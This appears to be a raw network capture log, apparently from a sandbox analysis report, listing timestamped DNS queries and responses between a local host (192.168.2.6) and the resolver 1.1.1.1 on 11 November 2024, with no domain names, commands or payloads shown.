                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.951873064 CET5885453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.952027082 CET5816653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.958334923 CET53507601.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.959934950 CET53567521.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.960750103 CET5676553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.960988998 CET5652853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.961020947 CET53569941.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.961174965 CET5986353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.961708069 CET53558951.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.962126970 CET5274953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.962308884 CET5272353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.962397099 CET53650831.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.962409973 CET53581661.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.962475061 CET6170453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.962613106 CET5435853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.963047981 CET6196453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.963236094 CET6539053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.963411093 CET6022553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.963743925 CET5973753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.963979006 CET4940053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.964162111 CET6458053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.964308977 CET4992753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.964700937 CET5937853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.964988947 CET6171453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.965270042 CET6298053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.965476990 CET5505453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.966861963 CET53550961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.970211983 CET53567651.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.970364094 CET53594101.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.970799923 CET53592551.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.970875978 CET53597371.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.971237898 CET53598631.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.971261024 CET53565281.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.972266912 CET53617041.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.972279072 CET53543581.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.972610950 CET53619641.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.548378944 CET53573771.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.552567005 CET5557453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.558682919 CET53591881.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.564471006 CET53555741.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.569519997 CET53640311.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.648226976 CET5266353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.650856018 CET5345053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.658752918 CET53526631.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.662022114 CET53534501.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.707451105 CET5092053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.710880995 CET4936653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.718121052 CET53509201.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.718574047 CET53493661.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.774678946 CET5143853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.775126934 CET5806853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.784670115 CET53514381.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.785068035 CET53580681.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.828207970 CET5296153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.838938951 CET53529611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.839971066 CET5769753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.850933075 CET53576971.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.877986908 CET5576353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.888248920 CET53557631.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.901956081 CET6135353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.936856985 CET53613531.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.943068027 CET5205353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.975317001 CET53520531.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.038815022 CET6099053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.040832043 CET5573153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.050134897 CET53609901.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.155720949 CET5155953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.161046982 CET5904053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.280922890 CET6072353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.281198978 CET4947753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.282016039 CET6043253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.292517900 CET53557311.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.299174070 CET53494771.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.299253941 CET53604321.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.300297976 CET53515591.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.301549911 CET53590401.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.320615053 CET53607231.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.343518019 CET6490153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.344399929 CET6341053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.345057964 CET5498153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.354023933 CET53634101.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.354706049 CET53649011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.354995966 CET53549811.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.562999010 CET4957153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.868071079 CET6206453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.871175051 CET53495711.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.885309935 CET6177153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.887861967 CET5216153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.888211966 CET5287553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.888828039 CET5277053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.891716957 CET5096553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.893820047 CET6049153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.894042969 CET6153653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.894665003 CET6315153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.894685984 CET5462353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.895222902 CET6036053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.895507097 CET5675453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.896193981 CET5181553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.896730900 CET53617711.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.896756887 CET5910353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.896922112 CET6029553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.897583961 CET6424253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.897785902 CET5477453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.898298979 CET5899553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.898662090 CET6072553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.898713112 CET53521611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.898827076 CET6414153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.899187088 CET53527701.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.899715900 CET6242653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.901520014 CET53509651.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.903327942 CET5828853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.903650045 CET5721953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.903784990 CET53615361.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.904038906 CET53604911.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.904905081 CET53631511.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.905184031 CET53546231.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.905195951 CET53620641.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.905571938 CET53603601.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.906688929 CET53528751.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.906871080 CET53518151.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.907713890 CET53547741.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.908519030 CET53607251.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.908833027 CET53641411.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.908890963 CET53642421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.908945084 CET53589951.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.911853075 CET6217053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.912892103 CET53582881.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.913038015 CET53572191.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.927376986 CET53591031.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.927464008 CET53567541.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.930103064 CET53602951.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.930773020 CET53624261.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.943495035 CET53621701.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.215666056 CET6139853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.248593092 CET53613981.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.255040884 CET6340753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.255260944 CET5105053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.255413055 CET6209353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.255559921 CET5200153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.012691975 CET5344153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.013333082 CET53549801.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.019654036 CET5688153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.019747972 CET53501761.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.020423889 CET53516031.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.020639896 CET53518821.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.021332979 CET53558311.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.022628069 CET53520171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.023792982 CET53534411.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.023983002 CET53545671.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.023993015 CET53506721.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.025002956 CET6528553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.025743008 CET53550231.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.025907993 CET53637021.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.026726007 CET6234053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.026793957 CET53580641.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.029234886 CET53568811.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.045886993 CET53623401.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.053524971 CET5110653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.055414915 CET6485853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.056747913 CET53652851.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.063158035 CET53511061.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.065691948 CET53648581.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.258965969 CET5046453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.260139942 CET5102453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.260448933 CET5377053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.260950089 CET5280753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.261347055 CET6044453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.261627913 CET5028453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.261826038 CET6082053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.262181044 CET5135753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.262254000 CET5095553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.262562990 CET4956153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.262741089 CET5997653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.263015985 CET5621253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.264542103 CET6176753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.265055895 CET5246053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.265445948 CET5832053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.265610933 CET5940453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.265939951 CET6345953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.270553112 CET53504641.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.271038055 CET53537701.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.272665024 CET5929353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.272712946 CET53502841.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.272785902 CET53604441.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.273025036 CET5252253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.274270058 CET53599761.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.274290085 CET53509551.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.275070906 CET6112253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.276149035 CET5933853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.277559042 CET53562121.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.277570963 CET53634591.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.277580976 CET53524601.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.277591944 CET53583201.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.281517982 CET53513571.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.285053968 CET53594041.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.286583900 CET53593381.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.291054964 CET53510241.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.291460037 CET53528071.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.293652058 CET53608201.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.293926001 CET53495611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.294855118 CET53617671.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.304225922 CET53592931.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.304832935 CET53525221.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.307132006 CET53611221.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.507536888 CET5638253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.509537935 CET6526253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.518379927 CET53563821.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.541362047 CET53652621.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:39.106549978 CET6235653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:39.108784914 CET5315353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:39.108943939 CET5360853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:39.114473104 CET53623561.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:39.120558023 CET53531531.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:39.139820099 CET53536081.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.292850018 CET5846453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.293374062 CET6407753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.293946028 CET5867653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.294572115 CET5152653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.299303055 CET5864553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.300406933 CET53584641.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.300474882 CET5170453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.300822020 CET5340753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.301237106 CET5818553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.301476002 CET5525153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.301819086 CET5912453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.302259922 CET5779353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.304189920 CET53586761.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.304255009 CET6498753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.304517031 CET53640771.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.308413982 CET53586451.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.310313940 CET53517041.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.311157942 CET53552511.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.311388016 CET53534071.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.311510086 CET53591241.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.311731100 CET53581851.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.311886072 CET53577931.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.313364983 CET53649871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.318511963 CET6378753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.320471048 CET5213153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.320492983 CET6143753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.321589947 CET5390253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.321742058 CET6353953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.622865915 CET53596971.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.624078035 CET53594621.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.624377012 CET53507741.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.642112017 CET53601111.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.654731989 CET53621921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.801790953 CET5085553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.802035093 CET6552353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.802381992 CET5134853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.802584887 CET6487353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.804702044 CET6537753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.804862022 CET5823053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.804878950 CET5626853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.805166960 CET6363053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.805378914 CET6548253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.805526972 CET6158553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.805604935 CET5137053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.805835962 CET5767853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.806076050 CET6137753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.806180954 CET6196053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.806718111 CET5426553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.808319092 CET5521053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.811844110 CET53653771.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.811995983 CET53655231.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.812401056 CET53508551.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.812939882 CET53513481.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.814209938 CET53542651.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.814979076 CET53562681.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.814990044 CET53582301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.815865993 CET53576781.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.816812038 CET53613771.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.817580938 CET53619601.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.818384886 CET53552101.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.828174114 CET53636301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.834798098 CET53648731.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.836462021 CET53615851.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.837321997 CET53513701.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.838077068 CET53654821.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.848514080 CET5698553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.853260994 CET6075653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.853765965 CET4972653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.879749060 CET53569851.1.1.1192.168.2.6
